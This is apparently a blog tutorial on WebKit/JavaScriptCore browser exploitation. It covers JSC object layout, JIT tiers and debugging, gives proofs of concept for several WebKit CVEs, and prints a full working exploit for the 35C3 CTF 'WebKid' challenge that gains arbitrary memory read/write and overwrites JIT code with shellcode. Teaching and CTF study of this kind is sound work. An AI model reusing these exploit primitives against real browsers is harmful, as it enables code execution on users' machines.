0x5624a900b3f1 JSC::JSValue::toString(JSC::ExecState*) const 11 0x5624a8fcc3a9 12 0x5624a8fcc70c 13 0x7f05131fe177 Illegal instruction (core dumped) If we run this on latest version(git checkout master to switch back, and delete build content rm -rf WebKitBuild/Relase/* and rm -rf WebKitBuild/Debug/*😞 ./jsc poc.js WARNING: ASAN interferes with JSC signal handlers; useWebAssemblyFastMemory will be disabled. OK undefined ================================================================= ==96575==ERROR: LeakSanitizer: detected memory leaks Direct leak of 96 byte(s) in 3 object(s) allocated from: #0 0x7fe1f579e458 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe0458) #1 0x7fe1f2db7cc8 in __gnu_cxx::new_allocator<std::_Sp_counted_deleter<std::mutex*, std::__shared_ptr<std::mutex, (__gnu_cxx::_Lock_policy)2>::_Deleter<std::allocator<std::mutex> >, std::allocator<std::mutex>, (__gnu_cxx::_Lock_policy)2> >::allocate(unsigned long, void const*) (/home/browserbox/WebKit/WebKitBuild/Debug/lib/libJavaScriptCore.so.1+0x5876cc8) #2 0x7fe1f2db7a7a in std::allocator_traits<std::allocator<std::_Sp_counted_deleter<std::mutex*, std::__shared_ptr<std::mutex, (__gnu_cxx::_Lock_policy)2>::_Deleter<std::allocator<std::mutex> >, std::allocator<std::mutex>, (__gnu_cxx::_Lock_policy)2> > >::allocate(std::allocator<std::_Sp_counted_deleter<std::mutex*, std::__shared_ptr<std::mutex, ... // lots of error message SUMMARY: AddressSanitizer: 216 byte(s) leaked in 6 allocation(s). Now, we succeed triggering a bug! I am not gonna to explain the detail(I don’t know either). Hope we can figure out the root cause after a few weeks Understanding WebKit Vulnerability Now, it’s time to discuss something deeper. Before we start to talk about WebKit architecture, let’s find out common bugs in WebKit. Here, I only discuss binary level related bugs. Some higher level bugs, like URL Spoof or UXSS, are not our topic. Examples below are not merely from WebKit. Some are Chrome’s bugs. We will introduce briefly. And analyze PoC specifically later. Before reading this part, you are strongly recommended to read some materials about compiler theory. Basic Pwn knowledge should also be learned. My explanation is not clear. Again, correct my mistakes if you find. This post will be updated several times as my understanding in JSC becomes deeper. Don’t forget to check it later. 1. Use After Free A.k.a UAF. This is common in CTF challenge, a classical scenario: char* a = malloc(0x100); free(a); printf("%s", a); Because of some logic errors. The code will reuse freed memory. Usually, we can leak or write once we controlled the freed memory. CVE-2017-13791 is an example for WebKit UAF. Here is the PoC: <script> function jsfuzzer() { textarea1.setRangeText("foo"); textarea2.autofocus = true; textarea1.name = "foo"; form.insertBefore(textarea2, form.firstChild); form.submit(); } function eventhandler2() { for(var i=0;i<100;i++) { var e = document.createElement("input"); form.appendChild(e); } } </script> <body onload=jsfuzzer()> <form id="form" onchange="eventhandler2()"> <textarea id="textarea1">a</textarea> <object id="object"></object> <textarea id="textarea2">b</textarea> 2. Out of Bound A.k.a OOB. It’s like the overflow in Browser. Still, we can read/write nearby memory. OOB frequently occurs in false optimization of an array or insufficient check. For example(CVE-2017-2447😞 var ba; function s(){ ba = this; } function dummy(){ alert("just a function"); } Object.defineProperty(Array.prototype, "0", {set : s }); var f = dummy.bind({}, 1, 2, 3, 4); ba.length = 100000; f(1, 2, 3); When Function.bind is called, the arguments to the call are transferred to an Array before they are passed to JSBoundFunction::JSBoundFunction. Since it is possible that the Array prototype has had a setter added to it, it is possible for user script to obtain a reference to this Array, and alter it so that the length is longer than the backing native butterfly array. Then when boundFunctionCall attempts to copy this array to the call parameters, it assumes the length is not longer than the allocated array (which would be true if it wasn’t altered) and reads out of bounds. In most cases. we cannot directly overwrite $RIP register. Exploit writers always craft fake array to turn partial R/W to arbitrary R/W. 3. Type Confusion It’s a special vulnerability that happens in applications with the compiler. And this bug is slightly difficult to explain. Imagine we have the following object(32 bits): struct example{ int length; char *content; } Then, if we have a length == 5 with a content pointer object in the memory, it probably shows like this: 0x00: 0x00000005 -> length 0x04: 0xdeadbeef -> pointer Once we have another object: struct exploit{ int length; void (*exp)(); } We can force the compiler to parse example object as exploit object. We can turn the exp function to arbitrary address and RCE. An example for type confusion: var q; function g(){ q = g.caller; return 7; } var a = [1, 2, 3]; a.length = 4; Object.defineProperty(Array.prototype, "3", {get : g}); [4, 5, 6].concat(a); q(0x77777777, 0x77777777, 0); Cited from CVE-2017-2446 If a builtin script in webkit is in strict mode, but then calls a function that is not strict, this function is allowed to call Function.caller and can obtain a reference to the strict function. 4. Integer Overflow Integer Overflow is also common in CTF. Though Integer Overflow itself cannot lead RCE, it probably leads to OOB. It’s not difficult to understand this bug. Imagine you are running below code in 32 bits machine: mov eax, 0xffffffff add eax, 2 Because the maximum of eax is 0xffffffff. In cannot contact 0xffffffff + 2 = 0x100000001. Thus, the higher byte will be overflowed(eliminated). The final result of eax is 0x00000001. This is an example from WebKit(CVE-2017-2536😞 var a = new Array(0x7fffffff); var x = [13, 37, ...a, ...a]; The length is not correctly checked resulting we can overflow the length via expanding an array to the old one. Then, we can use the extensive array to OOB. 5. Else Some bugs are difficult to categorize: Race Condition Unallocated Memory … I will explain them in detail later. JavaScriptCore in Depth The Webkit primarily includes: JavaScriptCore: JavaScript executing engine. WTF: Web Template Library, replacement for C++ STL lib. It has string operations, smart pointer, and etc. The heap operation is also unique here. DumpRenderTree: Produce RenderTree WebCore: The most complicated part. It has CSS, DOM, HTML, render, and etc. Almost every part of the browser despite components mentioned above. And the JSC has: lexer parser start-up interpreter (LLInt) three javascript JIT compiler, their compile time gradually becomes longer but run faster and faster: baseline JIT, the initial JIT a low-latency optimizing JIT (DFG) a high-throughput optimizing JIT (FTL), final phase of JIT two WebAssembly execution engines: BBQ OMG Still a disclaimer, this post might be inaccurate or wrong in explaining WebKit mechanisms If you have learned basic compile theory courses, lexer and parser are as usual as what taught in classes. But the code generation part is frustrating. It has one interpreter and three compilers, WTF? JSC also has many other unconventional features, let’s have a look: JSC Value Representation To easier identifying, JSC’s value represents differently: pointer : 0000:PPPP:PPPP:PPPP (begins with 0000, then its address) double (begins with 0001 or FFFE): 0001:****:****:**** FFFE:****:****:**** integer: FFFF:0000:IIII:IIII (use IIII:IIII for storing value) false: 0x06 true: 0x07 undefined: 0x0a null: 0x02 0x0, however, is not a valid value and can lead to a crash. JSC Object Model Unlike Java, which has fix class member, JavaScript allows people to add properties any time. So, despite traditionally statically align properties, JSC has a butterfly pointer for adding dynamic properties. It’s like an additional array. Let’s explain it in several situations. Also, JSArray will always be allocated to butterfly pointer since they change dynamically. We can understand the concept easily with the following graph: 0x0 Fast JSObject The properties are initialized: var o = {f: 5, g: 6}; The butterfly pointer will be null here since we only have static properties: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | NULL | --> Butterfly Pointer -------------- | 0xffff000 | --> 5 in JS format | 000000005 | -------------- | 0xffff000 | | 000000006 | --> 6 in JS format -------------- Let’s expand our knowledge of JSObject. As we see, each structure ID has a matched structure table. Inside the table, it contains the property names and their offsets. In our previous object o, the table looks like: property name location “f” inline(0) “g” inline(1) When we want to retrieve a value(e.g. var v = o.f), following behaviors will happen: if (o->structureID == 42) v = o->inlineStorage[0] else v = slowGet(o, “f”) You might wonder why the compiler will directly retrieve the value via offset when knowing the ID is 42. This is a mechanism called inline caching, which helps us to get value faster. We won’t talk about this much, click here for more details. 0x1 JSObject with dynamically added fields var o = {f: 5, g: 6}; o.h = 7; Now, the butterfly has a slot, which is 7. -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 0xffff000 | | 0xffff000 | | | 000000007 | | 000000005 | | ------------- -------------- -> | ... | | 0xffff000 | | 000000006 | -------------- 0x2 JSArray with room for 3 array elements var a = []; The butterfly initializes an array with estimated size. The first element 0 means a number of used slots. And 3 means the max slots: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 0 | | ------------- (8 bits for these two elements) | | 3 | -> ------------- | <hole> | ------------- | <hole> | ------------- | <hole> | ------------- 0x3 Object with fast properties and array elements var o = {f: 5, g: 6}; o[0] = 7; We filled an element of the array, so 0(used slots) increases to 1 now: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 1 | | 0xffff000 | | ------------- | 000000005 | | | 3 | -------------- -> ------------- | 0xffff000 | | 0xffff000 | | 000000006 | | 000000007 | -------------- ------------- | <hole> | ------------- | <hole> | ------------- 0x4 Object with fast and dynamic properties and array elements var o = {f: 5, g: 6}; o[0] = 7; o.h = 8; The new member will be appended before the pointer address. Arrays are placed on the right and attributes are on the left of butterfly pointer, just like the wing of a butterfly: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 0xffff000 | | 0xffff000 | | | 000000008 | | 000000005 | | ------------- -------------- | | 1 | | 0xffff000 | | ------------- | 000000006 | | | 2 | -------------- -> ------------- (pointer address) | 0xffff000 | | 000000007 | ------------- | <hole> | ------------- 0x5 Exotic object with dynamic properties and array elements var o = new Date(); o[0] = 7; o.h = 8; We extend the butterfly with a built-in class, the static properties will not change: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 0xffff000 | | < C++ | | | 000000008 | | State > | -> ------------- -------------- | 1 | | < C++ | ------------- | State > | | 2 | -------------- ------------- | 0xffff000 | | 000000007 | ------------- | <hole> | ------------- Type Inference JavaScript is a weak, dynamic type language. The compiler will do a lot of works in type inference, causing it becomes extremely complicated. Watchpoints Watchpoints can happen in the following cases: haveABadTime Structure transition InferredValue InferredType and many others… When above situations happen, it will check whether watchpoint has optimized. In WebKit, it represents like this: class Watchpoint { public: virtual void fire() = 0; }; For example, the compiler wants to optimize 42.toString() to "42" (return directly rather than use code to convert), it will check if it’s already invalidated. Then, If valid, register watchpoint and do the optimization. Compilers 0x0. LLInt At the very beginning, the interpreter will generate byte code template. Use JVM as an example, to executes .class file, which is another kind of byte code template. Byte code helps to execute easier: parser -> bytecompiler -> generatorfication -> bytecode linker -> LLInt 0x1. Baseline JIT and Byte Code Template Most basic JIT, it will generate byte code template here. For example, this is add in javascript: function foo(a, b) { return a + b; } This is bytecode IL, which is more straightforward without sophisticated lexes and more convenient to convert to asm: [ 0] enter [ 1] get_scope loc3 [ 3] mov loc4, loc3 [ 6] check_traps [ 7] add loc6, arg1, arg2 [12] ret loc6 Code segment 7 and 12 can result following DFG IL (which we talk next). we can notice that it has many type related information when operating. In line 4, the code will check if the returning type matches: GetLocal(Untyped:@1, arg1(B<Int32>/FlushedInt32), R:Stack(6), bc#7); GetLocal(Untyped:@2, arg2(C<BoolInt32>/FlushedInt32), R:Stack(7), bc#7); ArithAdd(Int32:@23, Int32:@24, CheckOverflow, Exits, bc#7); MovHint(Untyped:@25, loc6, W:SideState, ClobbersExit, bc#7, ExitInvalid); Return(Untyped:@25, W:SideState, Exits, bc#12); The AST looks like this: +----------+ | return | +----+-----+ | | +----+-----+ | add | +----------+ | | | | v v +--+---+ +-+----+ | arg1 | | arg2 | +------+ +------+ 0x2. DFG If JSC detects a function running a few times. It will go to the next phase. The first phase has already generated byte code. So, DFG parser parses byte code directly, which it’s less abstract and easier to parse. Then, DFG will optimize and generate code: DFG bytecode parser -> DFG optimizer -> DFG Backend In this step, the code runs many times; and they type is relatively constant. Type check will use OSR. Imagine we will optimize from this: int foo(int* ptr) { int w, x, y, z; w = ... // lots of stuff x = is_ok(ptr) ? *ptr : slow_path(ptr); y = ... // lots of stuff z = is_ok(ptr) ? *ptr : slow_path(ptr); return w + x + y + z; } to this: int foo(int* ptr) { int w, x, y, z; w = ... // lots of stuff if (!is_ok(ptr)) return foo_base1(ptr, w); x = *ptr; y = ... // lots of stuff z = *ptr; return w + x + y + z; } The code will run faster because ptr will only do type check once. If the type of ptr is always different, the optimized code runs slower because of frequent bailing out. Thus, only when the code runs thousands of times, the browser uses OSR to optimize it. 0x3. FLT A function, if, runs a hundred or thousands of time, the JIT will use FLT . Like DFG, FLT will reuse the byte code template, but with a deeper optimization: DFG bytecode parser -> DFG optimizer -> DFG-to-B3 lowering -> B3 Optimizer -> Instruction Selection -> Air Optimizer -> Air Backend 0x4. More About Optimization Let’s have a look on change of IR in different optimizing phases: IR Style Example Bytecode High Level Load/Store bitor dst, left, right DFG Medium Level Exotic SSA dst: BitOr(Int32:@left, Int32:@right, ...) B3 Low Level Normal SSA Int32 @dst = BitOr(@left, @right) Air Architectural CISC Or32 %src, %dest Type check is gradually eliminated. You may understand why there are so many type confusions in browser CVE now. In addition, they are more and more similar to machine code. Once the type check fails, the code will return to previous IR (e.g. a type check fails in B3 stage, the compiler will return to DFG and execute in this stage). Garbage Collector (TODO) The heap of JSC is based on GC. The objects in heap will have a counter about their references. GC will scan the heap to collect the useless memory. …still, need more materials… Writing Exploitation Before we start exploiting bugs, we should look at how difficult it is to write an exploit. We focus on exploit code writing here, the detail of the vulnerability will not be introduced much. This challenge is WebKid from 35c3 CTF. You can compile WebKit binary(with instructions), prepared VM, and get exploit code here. Also, a macOS Mojave (10.14.2) should be prepared in VM or real machine (I think it won’t affect crashes in different versions of macOS, but the attack primitive might be different). Run via this command: DYLD_LIBRARY_PATH=/Path/to/WebKid DYLD_FRAMEWORK_PATH=/Path/to/WebKid /Path/to/WebKid/MiniBrowser.app/Contents/MacOS/MiniBrowser Remember to use FULL PATH. Otherwise, the browser will crash If running on a local machine, remember to create /flag1 for testing. Analyzing Let’s look at the patch: diff --git a/Source/JavaScriptCore/runtime/JSObject.cpp b/Source/JavaScriptCore/runtime/JSObject.cpp index 20fcd4032ce..a75e4ef47ba 100644 --- a/Source/JavaScriptCore/runtime/JSObject.cpp +++ b/Source/JavaScriptCore/runtime/JSObject.cpp @@ -1920,6 +1920,31 @@ bool JSObject::hasPropertyGeneric(ExecState* exec, unsigned propertyName, Proper return const_cast<JSObject*>(this)->getPropertySlot(exec, propertyName, slot); } +static bool tryDeletePropertyQuickly(VM& vm, JSObject* thisObject, Structure* structure, PropertyName propertyName, unsigned attributes, PropertyOffset offset) +{ + ASSERT(isInlineOffset(offset) || isOutOfLineOffset(offset)); + + Structure* previous = structure->previousID(); + if (!previous) + return false; + + unsigned unused; + bool isLastAddedProperty = !isValidOffset(previous->get(vm, propertyName, unused)); + if (!isLastAddedProperty) + return false; + + RELEASE_ASSERT(Structure::addPropertyTransition(vm, previous, propertyName, attributes, offset) == structure); + + if (offset == firstOutOfLineOffset && !structure->hasIndexingHeader(thisObject)) { + ASSERT(!previous->hasIndexingHeader(thisObject) && structure->outOfLineCapacity() > 0 && previous->outOfLineCapacity() == 0); + thisObject->setButterfly(vm, nullptr); + } + + thisObject->setStructure(vm, previous); + + return true; +} + // ECMA 8.6.2.5 bool JSObject::deleteProperty(JSCell* cell, ExecState* exec, PropertyName propertyName) { @@ -1946,18 +1971,21 @@ bool JSObject::deleteProperty(JSCell* cell, ExecState* exec, PropertyName proper Structure* structure = thisObject->structure(vm); - bool propertyIsPresent = isValidOffset(structure->get(vm, propertyName, attributes)); + PropertyOffset offset = structure->get(vm, propertyName, attributes); + bool propertyIsPresent = isValidOffset(offset); if (propertyIsPresent) { if (attributes & PropertyAttribute::DontDelete && vm.deletePropertyMode() != VM::DeletePropertyMode::IgnoreConfigurable) return false; - PropertyOffset offset; - if (structure->isUncacheableDictionary()) + if (structure->isUncacheableDictionary()) { offset = structure->removePropertyWithoutTransition(vm, propertyName, [] (const ConcurrentJSLocker&, PropertyOffset) { }); - else - thisObject->setStructure(vm, Structure::removePropertyTransition(vm, structure, propertyName, offset)); + } else { + if (!tryDeletePropertyQuickly(vm, thisObject, structure, propertyName, attributes, offset)) { + thisObject->setStructure(vm, Structure::removePropertyTransition(vm, structure, propertyName, offset)); + } + } - if (offset != invalidOffset) + if (offset != invalidOffset && (!isOutOfLineOffset(offset) || thisObject->butterfly())) thisObject->locationForOffset(offset)->clear(); } diff --git a/Source/WebKit/WebProcess/com.apple.WebProcess.sb.in b/Source/WebKit/WebProcess/com.apple.WebProcess.sb.in index 536481ecd6a..62189fea227 100644 --- a/Source/WebKit/WebProcess/com.apple.WebProcess.sb.in +++ b/Source/WebKit/WebProcess/com.apple.WebProcess.sb.in @@ -25,6 +25,12 @@ (deny default (with partial-symbolication)) (allow system-audit file-read-metadata) +(allow file-read* (literal "/flag1")) + +(allow mach-lookup (global-name "net.saelo.shelld")) +(allow mach-lookup (global-name "net.saelo.capsd")) +(allow mach-lookup (global-name "net.saelo.capsd.xpc")) + #if PLATFORM(MAC) && __MAC_OS_X_VERSION_MIN_REQUIRED < 101300 (import "system.sb") #else The biggest problem here is about tryDeletePropertyQuickly function, which acted like this (comment provided from Linus Henze: static bool tryDeletePropertyQuickly(VM& vm, JSObject* thisObject, Structure* structure, PropertyName propertyName, unsigned attributes, PropertyOffset offset) { // This assert will always be true as long as we're not passing an "invalid" offset ASSERT(isInlineOffset(offset) || isOutOfLineOffset(offset)); // Try to get the previous structure of this object Structure* previous = structure->previousID(); if (!previous) return false; // If it has none, stop here unsigned unused; // Check if the property we're deleting is the last one we added // This must be the case if the old structure doesn't have this property bool isLastAddedProperty = !isValidOffset(previous->get(vm, propertyName, unused)); if (!isLastAddedProperty) return false; // Not the last property? Stop here and remove it using the normal way. // Assert that adding the property to the last structure would result in getting the current structure RELEASE_ASSERT(Structure::addPropertyTransition(vm, previous, propertyName, attributes, offset) == structure); // Uninteresting. Basically, this just deletes this objects Butterfly if it's not an array and we're asked to delete the last out-of-line property. The Butterfly then becomes useless because no property is stored in it, so we can delete it. if (offset == firstOutOfLineOffset && !structure->hasIndexingHeader(thisObject)) { ASSERT(!previous->hasIndexingHeader(thisObject) && structure->outOfLineCapacity() > 0 && previous->outOfLineCapacity() == 0); thisObject->setButterfly(vm, nullptr); } // Directly set the structure of this object thisObject->setStructure(vm, previous); return true; } In short, one object will fall back to previous structure ID by deleting an object added previously. For example: var o = [1.1, 2.2, 3.3, 4.4]; // o is now an object with structure ID 122. o.property = 42; // o is now an object with structure ID 123. The structure is a leaf (has never transitioned) function helper() { return o[0]; } jitCompile(helper); // Running helper function many times // In this case, the JIT compiler will choose to use a watchpoint instead of runtime checks // when compiling the helper function. As such, it watches structure 123 for transitions. delete o.property; // o now "went back" to structure ID 122. The watchpoint was not fired. Let’s review some knowledge first. In JSC, we have runtime type checks and watchpoint to ensure correct type conversion. After a function running many times, the JSC will not use structure check. Instead, it will replace it with watchpoint. When an object is modified, the browser should trigger watchpoint to notify this change to fallback to JS interpreter and generate new JIT code. Here, restoring to the previous ID does will not trigger watchpoint even though the structure has changed, which means the structure of butterfly pointer will also be changed. However, the JIT code generated by helper will not fallback since watchpoint is not trigged, leading to type confusion. And the JIT code can still access legacy butterfly structure. We can leak/create fake objects. This is the minimum attack primitive: haxxArray = [13.37, 73.31]; haxxArray.newProperty = 1337; function returnElem() { return haxxArray[0]; } function setElem(obj) { haxxArray[0] = obj; } for (var i = 0; i < 100000; i++) { returnElem(); setElem(13.37); } delete haxxArray.newProperty; haxxArray[0] = {}; function addrof(obj) { haxxArray[0] = obj; return returnElem(); } function fakeobj(address) { setElem(address); return haxxArray[0]; } // JIT code treat it as intereger, but it actually should be an object. // We can leak address from it print(addrof({})); // Almost the same as above, but it's for write data print(fakeobj(addrof({}))); Utility Functions The exploit script creates many utility functions. They help us to create primitive which you need in almost every webkit exploit. We will only look at some important functions. Getting Native Code To attack, we need a native code function to write shellcode or ROP. Besides, functions will only be a native code after running many times(this one is in pwn.js😞 function jitCompile(f, ...args) { for (var i = 0; i < ITERATIONS; i++) { f(...args); } } function makeJITCompiledFunction() { // Some code that can be overwritten by the shellcode. function target(num) { for (var i = 2; i < num; i++) { if (num % i === 0) { return false; } } return true; } jitCompile(target, 123); return target; } Controlling Bytes In the int64.js, we craft a class Int64. It uses Uint8Array to store number and creates many related operations like add and sub. In the previous chapter, we mention that JavaScript uses tagged value to represent the number, which means that you cannot control the higher byte. The Uint8Array array represents 8-bit unsigned integers just like native value, allowing us to control all 8 bytes. Simple example usage of Uint8Array: var x = new Uint8Array([17, -45.3]); var y = new Uint8Array(x); console.log(x[0]); // 17 console.log(x[1]); // value will be converted 8 bit unsigned integers // 211 It can be merged to a 16 byte array. The following shows us that Uint8Array store in native form clearly, because 0x0201 == 513: a = new Uint8Array([1,2,3,4]) b = new Uint16Array(a.buffer) // Uint16Array [513, 1027] Remaining functions of Int64 are simulations of different operations. You can infer their implementations from their names and comments. Reading the codes is easy too. Writing Exploit Detail about the Script I add some comments from Saelo’s original writeup(most comments are still his work, great thanks!): const ITERATIONS = 100000; // A helper function returns function with native code function jitCompile(f, ...args) { for (var i = 0; i < ITERATIONS; i++) { f(...args); } } jitCompile(function dummy() { return 42; }); // Return a function with native code, we will palce shellcode in this function later function makeJITCompiledFunction() { // Some code that can be overwritten by the shellcode. function target(num) { for (var i = 2; i < num; i++) { if (num % i === 0) { return false; } } return true; } jitCompile(target, 123); return target; } function setup_addrof() { var o = [1.1, 2.2, 3.3, 4.4]; o.addrof_property = 42; // JIT compiler will install a watchpoint to discard the // compiled code if the structure of |o| ever transitions // (a heuristic for |o| being modified). As such, there // won't be runtime checks in the generated code. function helper() { return o[0]; } jitCompile(helper); // This will take the newly added fast-path, changing the structure // of |o| without the JIT code being deoptimized (because the structure // of |o| didn't transition, |o| went "back" to an existing structure). delete o.addrof_property; // Now we are free to modify the structure of |o| any way we like, // the JIT compiler won't notice (it's watching a now unrelated structure). o[0] = {}; return function(obj) { o[0] = obj; return Int64.fromDouble(helper()); }; } function setup_fakeobj() { var o = [1.1, 2.2, 3.3, 4.4]; o.fakeobj_property = 42; // Same as above, but write instead of reading from the array. function helper(addr) { o[0] = addr; } jitCompile(helper, 13.37); delete o.fakeobj_property; o[0] = {}; return function(addr) { helper(addr.asDouble()); return o[0]; }; } function pwn() { var addrof = setup_addrof(); var fakeobj = setup_fakeobj(); // verify basic exploit primitives work. var addr = addrof({p: 0x1337}); assert(fakeobj(addr).p == 0x1337, "addrof and/or fakeobj does not work"); print('[+] exploit primitives working'); // from saelo: spray structures to be able to predict their IDs. // from Auxy: I am not sure about why spraying. i change the code to: // // var structs = [] // var i = 0; // var abc = [13.37]; // abc.pointer = 1234; // abc['prop' + i] = 13.37; // structs.push(abc); // var victim = structs[0]; // // and the payload still work stablely. It seems this action is redundant var structs = [] for (var i = 0; i < 0x1000; ++i) { var array = [13.37]; array.pointer = 1234; array['prop' + i] = 13.37; structs.push(array); } // take an array from somewhere in the middle so it is preceeded by non-null bytes which // will later be treated as the butterfly length. var victim = structs[0x800]; print(`[+] victim @ ${addrof(victim)}`); // craft a fake object to modify victim var flags_double_array = new Int64("0x0108200700001000").asJSValue(); var container = { header: flags_double_array, butterfly: victim }; // create object having |victim| as butterfly. var containerAddr = addrof(container); print(`[+] container @ ${containerAddr}`); // add the offset to let compiler recognize fake structure var hax = fakeobj(Add(containerAddr, 0x10)); // origButterfly is now based on the offset of **victim** // because it becomes the new butterfly pointer // and hax[1] === victim.pointer var origButterfly = hax[1]; var memory = { addrof: addrof, fakeobj: fakeobj, // Write an int64 to the given address. writeInt64(addr, int64) { hax[1] = Add(addr, 0x10).asDouble(); victim.pointer = int64.asJSValue(); }, // Write a 2 byte integer to the given address. Corrupts 6 additional bytes after the written integer. write16(addr, value) { // Set butterfly of victim object and dereference. hax[1] = Add(addr, 0x10).asDouble(); victim.pointer = value; }, // Write a number of bytes to the given address. Corrupts 6 additional bytes after the end. write(addr, data) { while (data.length % 4 != 0) data.push(0); var bytes = new Uint8Array(data); var ints = new Uint16Array(bytes.buffer); for (var i = 0; i < ints.length; i++) this.write16(Add(addr, 2 * i), ints[i]); }, // Read a 64 bit value. Only works for bit patterns that don't represent NaN. read64(addr) { // Set butterfly of victim object and dereference. hax[1] = Add(addr, 0x10).asDouble(); return this.addrof(victim.pointer); }, // Verify that memory read and write primitives work. test() { var v = {}; var obj = {p: v}; var addr = this.addrof(obj); assert(this.fakeobj(addr).p == v, "addrof and/or fakeobj does not work"); var propertyAddr = Add(addr, 0x10); var value = this.read64(propertyAddr); assert(value.asDouble() == addrof(v).asDouble(), "read64 does not work"); this.write16(propertyAddr, 0x1337); assert(obj.p == 0x1337, "write16 does not work"); }, }; // Testing code, not related to exploit var plainObj = {}; var header = memory.read64(addrof(plainObj)); memory.writeInt64(memory.addrof(container), header); memory.test(); print("[+] limited memory read/write working"); // get targetd function var func = makeJITCompiledFunction(); var funcAddr = memory.addrof(func); // change the JIT code to shellcode // offset addjustment is a little bit complicated here :P print(`[+] shellcode function object @ ${funcAddr}`); var executableAddr = memory.read64(Add(funcAddr, 24)); print(`[+] executable instance @ ${executableAddr}`); var jitCodeObjAddr = memory.read64(Add(executableAddr, 24)); print(`[+] JITCode instance @ ${jitCodeObjAddr}`); // var jitCodeAddr = memory.read64(Add(jitCodeObjAddr, 368)); // offset for debug builds // final JIT Code address var jitCodeAddr = memory.read64(Add(jitCodeObjAddr, 352)); print(`[+] JITCode @ ${jitCodeAddr}`); var s = "A".repeat(64); var strAddr = addrof(s); var strData = Add(memory.read64(Add(strAddr, 16)), 20); shellcode.push(...strData.bytes()); // write shellcode memory.write(jitCodeAddr, shellcode); // trigger shellcode var res = func(); var flag = s.split('\n')[0]; if (typeof(alert) !== 'undefined') alert(flag); print(flag); } if (typeof(window) === 'undefined') pwn(); Conclusion on the Exploitation To conclude, the exploit uses two most important attack primitive - addrof and fakeobj - to leak and craft. A JITed function is leaked and overwritten with our shellcode array. Then we called the function to leak flag. Almost all the browser exploits follow this form. Thanks, 35C3 CTF organizers especially Saelo. It’s a great challenge to learn WebKit type confusion. Debugging WebKit Now, we have understood all the theories: architecture, object model, exploitation. Let’s start some real operations. To prepare, use compiled JSC from Setup part. Just use the latest version since we only discuss debugging here. I used to try to set breakpoints to find their addresses, but this is actually very stupid. JSC has many non-standard functions which can dump information for us (you cannot use most of them in Safari!): print() and debug(): Like console.log() in node.js, it will output information to our terminal. However, print in Safari will use a real-world printer to print documents. describe(): Describe one object. We can get the address, class member, and related information via the function. describeArrya(): Similar to describe(), but it focuses on array information of an object. readFile(): Open a file and get the content noDFG() and noFLT(): Disable some JIT compilers. Setting Breakpoints The easiest way to set breakpoints is breaking an unused function. Something like print or Array.prototype.slice([]);. Since we do not know if a function will affect one PoC most of the time, this method might bring some side effect. Setting vulnerable functions as our breakpoints also work. When you try to understand a vulnerability, breaking them will be extremely important. But their calling stacks may not be pleasant. We can also customize a debugging function (use int 3) in WebKit source code. Defining, implementing, and registering our function in /Source/JavaScriptCore/jsc.cpp. It helps us to hang WebKit in debuggers: static EncodedJSValue JSC_HOST_CALL functionDbg(ExecStage*); addFunction(vm, "dbg", functionDbg, 0); static EncodedJSValue JSC_HOST_CALL functionDbg(ExecStage* exec) { asm("int 3"); return JSValue::encode(jsUndefined()); } Since the third method requires us to modify the source code, I prefer the previous two personally. Inspecting JSC Objects Okay, we use this script: arr = [0, 1, 2, 3] debug(describe(arr)) print() Use our gdb with gef to debug; you may guess out we will break the print(): gdb jsc gef> b *printInternal gef> r --> Object: 0x7fffaf4b4350 with butterfly 0x7ff8000e0010 (Structure 0x7fffaf4f2b50:[Array, {}, CopyOnWriteArrayWithInt32, Proto:0x7fffaf4c80a0, Leaf]), StructureID: 100 ... // Some backtrace The Object address and butterfly pointer might vary on your machine. If we edit the script, the address may also change. Please adjust them based on your output. We shall have a first glance on the object and its pointer: gef> x/2gx 0x7fffaf4b4350 0x7fffaf4b4350: 0x0108211500000064 0x00007ff8000e0010 gef> x/4gx 0x00007ff8000e0010 0x7ff8000e0010: 0xffff000000000000 0xffff000000000001 0x7ff8000e0020: 0xffff000000000002 0xffff000000000003 What if we change it to float? arr = [1.0, 1.0, 2261634.5098039214, 2261634.5098039214] debug(describe(arr)) print() We use a small trick here: 2261634.5098039214 represents as 0x4141414141414141 in memory. Finding value is more handy via the magical number (we use butterfly pointer directly here). In default, JSC will filled unused memory with 0x00000000badbeef0: gef> x/10gx 0x00007ff8000e0010 0x7ff8000e0010: 0x3ff0000000000000 0x3ff0000000000000 0x7ff8000e0020: 0x4141414141414141 0x4141414141414141 0x7ff8000e0030: 0x00000000badbeef0 0x00000000badbeef0 0x7ff8000e0040: 0x00000000badbeef0 0x00000000badbeef0 0x7ff8000e0050: 0x00000000badbeef0 0x00000000badbeef0 The memory layout is the same as the JSC Object Model part, so we won’t repeat here. Getting Native Code Now, it’s time to get compiled function. It plays an important role in understanding JSC compiler and exploiting: const ITERATIONS = 100000; function jitCompile(f, ...args) { for (var i = 0; i < ITERATIONS; i++) { f(...args); } } jitCompile(function dummy() { return 42; }); debug("jitCompile Ready") function makeJITCompiledFunction() { function target(num) { for (var i = 2; i < num; i++) { if (num % i === 0) { return false; } } return true; } jitCompile(target, 123); return target; } func = makeJITCompiledFunction() debug(describe(func)) print() It’s not hard if you read previous section carefully. Now, we should get their native code in the debugger: --> Object: 0x7fffaf468120 with butterfly (nil) (Structure 0x7fffaf4f1b20:[Function, {}, NonArray, Proto:0x7fffaf4d0000, Leaf]), StructureID: 63 ... // Some backtrace ... gef> x/gx 0x7fffaf468120+24 0x7fffaf468138: 0x00007fffaf4fd080 gef> x/gx 0x00007fffaf4fd080+24 0x7fffaf4fd098: 0x00007fffefe46000 // In debug mode, it's okay to use 368 as offset // In release mode, however, it should be 352 gef> x/gx 0x00007fffefe46000+368 0x7fffefe46170: 0x00007fffafe02a00 gef> hexdump byte 0x00007fffafe02a00 0x00007fffafe02a00 55 48 89 e5 48 8d 65 d0 48 b8 60 0c 45 af ff 7f UH..H.e.H.`.E... 0x00007fffafe02a10 00 00 48 89 45 10 48 